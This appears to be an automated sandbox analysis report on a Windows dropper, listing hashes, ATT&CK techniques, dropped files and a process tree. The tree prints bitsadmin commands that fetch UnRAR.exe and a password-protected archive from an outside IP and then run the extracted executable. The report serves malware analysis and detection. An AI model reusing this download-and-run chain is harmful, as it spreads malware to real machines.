a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181

Analysis

max time kernel
145s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/11/2024, 08:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
Size

42KB
MD5

56944be08ed3307c498123514956095b
SHA1

53ffb50051da62f2c2cee97fe048a1441e95a812
SHA256

a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181
SHA512

aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13
SSDEEP

768:hef6qfEqLBTxrLkSRoys2uGUmRDcMznWHWmZCXrs0D3S9i1GcucbMgAoG:efHLrLkSRoybCQUZsrs0DC1cucbMDoG

Score

8^/10

discovery dropper

Malware Config

Signatures

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

pid	Process
1760	bitsadmin.exe
1660	bitsadmin.exe

Downloads MZ/PE file

Executes dropped EXE 8 IoCs

pid	Process
1844	letgrtsC1.exe
1440	letgrtsC1.exe
4972	letgrtsC1.exe
1064	letgrtsC1.exe
3484	letgrtsC1.exe
3612	letgrtsC1.exe
3296	letgrtsC1.exe
1388	letgrtsC1.exe

Loads dropped DLL 31 IoCs

pid	Process
4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
1440	letgrtsC1.exe
1440	letgrtsC1.exe
1440	letgrtsC1.exe
1440	letgrtsC1.exe
1440	letgrtsC1.exe
1440	letgrtsC1.exe
1440	letgrtsC1.exe
1064	letgrtsC1.exe
1064	letgrtsC1.exe
1064	letgrtsC1.exe
1064	letgrtsC1.exe
1064	letgrtsC1.exe
1064	letgrtsC1.exe
1064	letgrtsC1.exe
3612	letgrtsC1.exe
3612	letgrtsC1.exe
3612	letgrtsC1.exe
3612	letgrtsC1.exe
3612	letgrtsC1.exe
3612	letgrtsC1.exe
3612	letgrtsC1.exe
1388	letgrtsC1.exe
1388	letgrtsC1.exe
1388	letgrtsC1.exe
1388	letgrtsC1.exe
1388	letgrtsC1.exe
1388	letgrtsC1.exe
1388	letgrtsC1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ping.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	letgrtsC1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4544	ping.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4544	ping.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 4544	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	83
PID 4768 wrote to memory of 4544	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	83
PID 4768 wrote to memory of 4544	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	83
PID 4768 wrote to memory of 1760	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	85
PID 4768 wrote to memory of 1760	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	85
PID 4768 wrote to memory of 1760	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	85
PID 4768 wrote to memory of 1660	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	102
PID 4768 wrote to memory of 1660	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	102
PID 4768 wrote to memory of 1660	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	102
PID 4768 wrote to memory of 2684	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	108
PID 4768 wrote to memory of 2684	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	108
PID 4768 wrote to memory of 1844	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	110
PID 4768 wrote to memory of 1844	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	110
PID 4768 wrote to memory of 1844	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	110
PID 1844 wrote to memory of 1440	1844	letgrtsC1.exe	111
PID 1844 wrote to memory of 1440	1844	letgrtsC1.exe	111
PID 1844 wrote to memory of 1440	1844	letgrtsC1.exe	111
PID 1440 wrote to memory of 2864	1440	letgrtsC1.exe	112
PID 1440 wrote to memory of 2864	1440	letgrtsC1.exe	112
PID 1440 wrote to memory of 2864	1440	letgrtsC1.exe	112
PID 4768 wrote to memory of 4972	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	113
PID 4768 wrote to memory of 4972	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	113
PID 4768 wrote to memory of 4972	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	113
PID 4972 wrote to memory of 1064	4972	letgrtsC1.exe	114
PID 4972 wrote to memory of 1064	4972	letgrtsC1.exe	114
PID 4972 wrote to memory of 1064	4972	letgrtsC1.exe	114
PID 1064 wrote to memory of 4800	1064	letgrtsC1.exe	115
PID 1064 wrote to memory of 4800	1064	letgrtsC1.exe	115
PID 1064 wrote to memory of 4800	1064	letgrtsC1.exe	115
PID 4768 wrote to memory of 3484	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	116
PID 4768 wrote to memory of 3484	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	116
PID 4768 wrote to memory of 3484	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	116
PID 3484 wrote to memory of 3612	3484	letgrtsC1.exe	117
PID 3484 wrote to memory of 3612	3484	letgrtsC1.exe	117
PID 3484 wrote to memory of 3612	3484	letgrtsC1.exe	117
PID 3612 wrote to memory of 2176	3612	letgrtsC1.exe	118
PID 3612 wrote to memory of 2176	3612	letgrtsC1.exe	118
PID 3612 wrote to memory of 2176	3612	letgrtsC1.exe	118
PID 4768 wrote to memory of 3296	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	119
PID 4768 wrote to memory of 3296	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	119
PID 4768 wrote to memory of 3296	4768	a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe	119
PID 3296 wrote to memory of 1388	3296	letgrtsC1.exe	120
PID 3296 wrote to memory of 1388	3296	letgrtsC1.exe	120
PID 3296 wrote to memory of 1388	3296	letgrtsC1.exe	120
PID 1388 wrote to memory of 2488	1388	letgrtsC1.exe	121
PID 1388 wrote to memory of 2488	1388	letgrtsC1.exe	121
PID 1388 wrote to memory of 2488	1388	letgrtsC1.exe	121

C:\Users\Admin\AppData\Local\Temp\a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
"C:\Users\Admin\AppData\Local\Temp\a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Windows\SysWOW64\ping.exe
  ping -n 1 8.8.8.8
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4544
- C:\Windows\SysWOW64\bitsadmin.exe
  bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:1760
- C:\Windows\SysWOW64\bitsadmin.exe
  bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:1660
- C:\Users\Admin\AppData\Local\Temp\UnRAR.exe
  "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe" x -o+ -pQwerty1234.Q "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp"
  2⤵
  PID:2684
- C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
  "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
    "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
      4⤵
      PID:2864
- C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
  "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
    "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
      4⤵
      PID:4800
- C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
  "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
    "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
      4⤵
      PID:2176
- C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
  "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe
    "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
      4⤵
      PID:2488

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI18442\VCRUNTIME140.dll

Filesize
74KB

MD5
e4ca3dce43b1184bb18ff01f3a0f1a40

SHA1
604611d559ca41e73b12c362de6acf84db9aee43

SHA256
0778c7e17016895bb6962a9774acc5568afa1a50ba309b7d9726c89dad70bdbf

SHA512
137c884afa1b0b731bbd523abb47b83f31487a6ca051487292bc2a9eb7f103a0d3974fa743014018bd564be957210bdcd62c822f4ffb6441aee23b444c23e812

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_ctypes.pyd

Filesize
114KB

MD5
97c703c86e9cf46876330db4bccc2796

SHA1
7719b2993ec530b2cdaabd1b19a367fa34f67d54

SHA256
6e1848fc6dbc3ca3eab702dd917dac65438d694fae06216ba0140bbfac984616

SHA512
d810ccad5bf4d088911e184d38b0f08e52a026ea92f3f87b76bd5241c4a33825feff3999c6c1da0788e1c13b80249ea973db0de8f62f3be15452b5dedaa0be65

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_hashlib.pyd

Filesize
51KB

MD5
bcd4b6cf779df7f8e3dc3408aadcc9a1

SHA1
3d7e62557e1c0911106d0093ab2473717a26d7fd

SHA256
9ac455118a145e7cc77f18029a49cbcd6d7387c544550f7acb46bff2c073365f

SHA512
0794a29cbc237b12c34b4adab85f15894c3bb727453ae422e3f3fb06b845894773b5f215562b9533162be058d89b657596ae4a86e3de9c3426ec923d2d40d084

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\_uuid.pyd

Filesize
20KB

MD5
610aee1f428720b6f445cc68b179f7fc

SHA1
a2a118ab19490a74c85fe85b99ddc2b58df16028

SHA256
3dfe8bf38510b94c2cb38c2b38072f40e1e84b64bbb14b740bed3352c83f8ff3

SHA512
a243dd9333009683bf0899a1138d59874ab5aa663fdae39dc3513da2767f86a1efeaced7a8a291c52dd5112610af40bfb9277c017bba623c9783b06fc67692c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\base_library.zip

Filesize
1011KB

MD5
ca122efc905b32faa44d40b185b218f2

SHA1
6704695961d71dd9315f953fc3f33ca768ddad04

SHA256
2411920f5fe750a836d4e015834fb567c8e192a4bf431894c8878976295d6466

SHA512
519e0c99b24b97746f2e90a084439c551ced2da0b829b289757e7c0b895927f7a6d2bcc36f71f5c0936d20eb424a14c0d45cdf216d535e4f01f45531dbdd91ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\libcrypto-1_1.dll

Filesize
2.1MB

MD5
c7298cd5232cf8f6e34b3404fc276266

SHA1
a043e0ff71244a65a9c2c27c95622e6cc127b932

SHA256
1e95a63b165672accde92a9c9f8b9052c8f6357344f1376af9f916aeeb306da3

SHA512
212b0c5d27615e8375d32d1952beee6b8292f38aae9c9612633839c4b102fcdb2555c3ee206f0df942df49cddb1d833e2773d7dc95a367a0c6628b871d6c6892

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\libffi-7.dll

Filesize
28KB

MD5
bc20614744ebf4c2b8acd28d1fe54174

SHA1
665c0acc404e13a69800fae94efd69a41bdda901

SHA256
0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

SHA512
0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI18442\python39.dll

Filesize
4.2MB

MD5
b28171046f2d50c645b076b6ebac220e

SHA1
4fb1ca03eb372592e0b20d5e7aceedb501bbb64c

SHA256
6366bcf2e53e6f3dc588779b3b7401b7ad955759c03d722221595e26a8d8f347

SHA512
7b9cd051ec42e23110020ed75281eec7854ad7f885c150377885663bee2a0e5b1eece6d7a54837b60e622fa8f56c2d1dbcb62bc8c086c017d9831db8717cd0c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgC9B9.tmp\nsExec.dll

Filesize
7KB

MD5
11092c1d3fbb449a60695c44f9f3d183

SHA1
b89d614755f2e943df4d510d87a7fc1a3bcf5a33

SHA256
2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

SHA512
c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads